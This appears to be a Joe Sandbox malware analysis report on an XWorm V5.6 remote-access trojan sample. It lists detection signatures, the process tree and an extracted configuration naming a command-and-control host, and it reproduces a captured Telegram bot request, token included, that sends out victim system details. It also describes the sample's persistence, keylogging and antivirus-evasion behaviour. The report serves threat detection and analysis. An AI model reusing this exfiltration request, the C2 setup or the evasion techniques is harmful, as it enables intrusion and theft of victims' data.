Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yF21ypxRB7.exe

Overview

General Information

Sample name:yF21ypxRB7.exe
renamed because original name is a hash value
Original sample name:b31d01d8e826ea4773cd7cfdbfca3712287024c03463acb374b5040af27fae71.exe
Analysis ID:1557207
MD5:640194b0d51307f362b74fd4a4a1761d
SHA1:8e623f6ba2c87803f079b85578289359d71c6c90
SHA256:b31d01d8e826ea4773cd7cfdbfca3712287024c03463acb374b5040af27fae71
Tags:exeuser-Chainskilabs
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to log keystrokes (.Net Source)
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • yF21ypxRB7.exe (PID: 6312 cmdline: "C:\Users\user\Desktop\yF21ypxRB7.exe" MD5: 640194B0D51307F362B74FD4A4A1761D)
  • svchost.exe (PID: 1496 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 1416 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6724 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 1424 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 7984 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7436 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7584 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 640194B0D51307F362B74FD4A4A1761D)
  • svchost.exe (PID: 7788 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 640194B0D51307F362B74FD4A4A1761D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["perfect-invest.gl.at.ply.gg"], "Port": 61586, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
yF21ypxRB7.exeJoeSecurity_XWormYara detected XWormJoe Security
    yF21ypxRB7.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      yF21ypxRB7.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x8421:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x84be:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x85d3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x80cf:$cnc4: POST / HTTP/1.1

      PCAP (Network Traffic)

      SourceRuleDescriptionAuthorStrings
      sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Roaming\svchost.exeJoeSecurity_XWormYara detected XWormJoe Security
          C:\Users\user\AppData\Roaming\svchost.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            C:\Users\user\AppData\Roaming\svchost.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x8421:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x84be:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x85d3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x80cf:$cnc4: POST / HTTP/1.1

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000000.00000000.1245680814.0000000000472000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000000.00000000.1245680814.0000000000472000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x8221:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x82be:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x83d3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x7ecf:$cnc4: POST / HTTP/1.1
              Process Memory Space: yF21ypxRB7.exe PID: 6312JoeSecurity_XWormYara detected XWormJoe Security
                Process Memory Space: yF21ypxRB7.exe PID: 6312JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  0.0.yF21ypxRB7.exe.470000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    0.0.yF21ypxRB7.exe.470000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0x8421:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x84be:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x85d3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0x80cf:$cnc4: POST / HTTP/1.1

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Files With System Process Name In Unsuspected Locations
                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\yF21ypxRB7.exe, ProcessId: 6312, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
                    Sigma detected: System File Execution Location Anomaly
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 7584, ProcessName: svchost.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\yF21ypxRB7.exe, ProcessId: 6312, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
                    Sigma detected: Startup Folder File Write
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\yF21ypxRB7.exe, ProcessId: 6312, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 1496, ProcessName: svchost.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-17T19:24:11.934770+010028536851A Network Trojan was detected192.168.2.749699149.154.167.220443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-17T19:26:29.897915+010028531931Malware Command and Control Activity Detected192.168.2.749984147.185.221.2361586TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: yF21ypxRB7.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: perfect-invest.gl.at.ply.ggAvira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\svchost.exeAvira: detection malicious, Label: TR/Spy.Gen
                    Found malware configuration
                    Source: yF21ypxRB7.exeMalware Configuration Extractor: Xworm {"C2 url": ["perfect-invest.gl.at.ply.gg"], "Port": 61586, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\svchost.exeReversingLabs: Detection: 78%
                    Multi AV Scanner detection for submitted file
                    Source: yF21ypxRB7.exeReversingLabs: Detection: 78%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\svchost.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: yF21ypxRB7.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: yF21ypxRB7.exeString decryptor: perfect-invest.gl.at.ply.gg
                    Source: yF21ypxRB7.exeString decryptor: 61586
                    Source: yF21ypxRB7.exeString decryptor: <123456789>
                    Source: yF21ypxRB7.exeString decryptor: <Xwormmm>
                    Source: yF21ypxRB7.exeString decryptor: XWorm V5.6
                    Source: yF21ypxRB7.exeString decryptor: USB.exe
                    Source: yF21ypxRB7.exeString decryptor: %AppData%
                    Source: yF21ypxRB7.exeString decryptor: svchost.exe
                    Source: yF21ypxRB7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49699 version: TLS 1.2
                    Source: yF21ypxRB7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49978 -> 147.185.221.23:61586
                    Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49984 -> 147.185.221.23:61586
                    Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.7:49699 -> 149.154.167.220:443
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: perfect-invest.gl.at.ply.gg
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: yF21ypxRB7.exe, type: SAMPLE
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                    Source: global trafficTCP traffic: 192.168.2.7:49700 -> 147.185.221.23:61586
                    Source: global trafficHTTP traffic detected: GET /bot7602273147:AAGPHHPgO8DxUDOWK0ZCgtSD_Rua_8wVzrE/sendMessage?chat_id=6589427579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A95B5CEC98776D486C10E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20CO53M%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 147.185.221.23 147.185.221.23
                    Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /bot7602273147:AAGPHHPgO8DxUDOWK0ZCgtSD_Rua_8wVzrE/sendMessage?chat_id=6589427579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A95B5CEC98776D486C10E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20CO53M%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficDNS traffic detected: DNS query: time.windows.com
                    Source: global trafficDNS traffic detected: DNS query: perfect-invest.gl.at.ply.gg
                    Source: yF21ypxRB7.exe, 00000000.00000002.3701617400.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: svchost.exe, 00000002.00000002.1366625213.0000027E79813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.comsv
                    Source: yF21ypxRB7.exe, svchost.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                    Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                    Source: svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
                    Source: svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366114410.0000027E79859000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365942027.0000027E7986E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366768678.0000027E79870000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000002.00000003.1365942027.0000027E7986E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366768678.0000027E79870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                    Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                    Source: svchost.exe, 00000002.00000002.1366755363.0000027E79868000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365994412.0000027E79867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                    Source: svchost.exe, 00000002.00000002.1366782396.0000027E79877000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365876022.0000027E79875000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                    Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                    Source: svchost.exe, 00000002.00000003.1366114410.0000027E79859000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                    Source: svchost.exe, 00000002.00000002.1366755363.0000027E79868000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365994412.0000027E79867000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366644805.0000027E7982B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                    Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                    Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                    Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                    Source: svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366644805.0000027E7982B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                    Source: svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                    Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                    Source: svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                    Source: svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&
                    Source: svchost.exe, 00000002.00000003.1365861003.0000027E79855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                    Source: svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                    Source: svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
                    Source: svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365861003.0000027E79855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366061020.0000027E7985D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                    Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                    Source: svchost.exe, 00000002.00000003.1264330890.0000027E79836000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
                    Source: svchost.exe, 00000002.00000002.1366755363.0000027E79868000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365994412.0000027E79867000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366644805.0000027E7982B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                    Source: svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366127965.0000027E79848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                    Source: svchost.exe, 00000002.00000003.1366127965.0000027E79848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 00000002.00000002.1366644805.0000027E7982B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                    Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                    Source: svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49699 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: yF21ypxRB7.exe, XLogger.cs.Net Code: KeyboardLayout
                    Source: svchost.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: yF21ypxRB7.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.0.yF21ypxRB7.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000000.1245680814.0000000000472000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeCode function: 0_2_00007FFAAC5B79C20_2_00007FFAAC5B79C2
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeCode function: 0_2_00007FFAAC5B0ED90_2_00007FFAAC5B0ED9
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeCode function: 0_2_00007FFAAC5B6C160_2_00007FFAAC5B6C16
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeCode function: 0_2_00007FFAAC5B4FDD0_2_00007FFAAC5B4FDD
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 8_2_00007FFAAC570ED98_2_00007FFAAC570ED9
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 10_2_00007FFAAC580ED910_2_00007FFAAC580ED9
                    Source: yF21ypxRB7.exe, 00000000.00000000.1245680814.000000000047C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVmxCheats.exe4 vs yF21ypxRB7.exe
                    Source: yF21ypxRB7.exeBinary or memory string: OriginalFilenameVmxCheats.exe4 vs yF21ypxRB7.exe
                    Source: yF21ypxRB7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: yF21ypxRB7.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
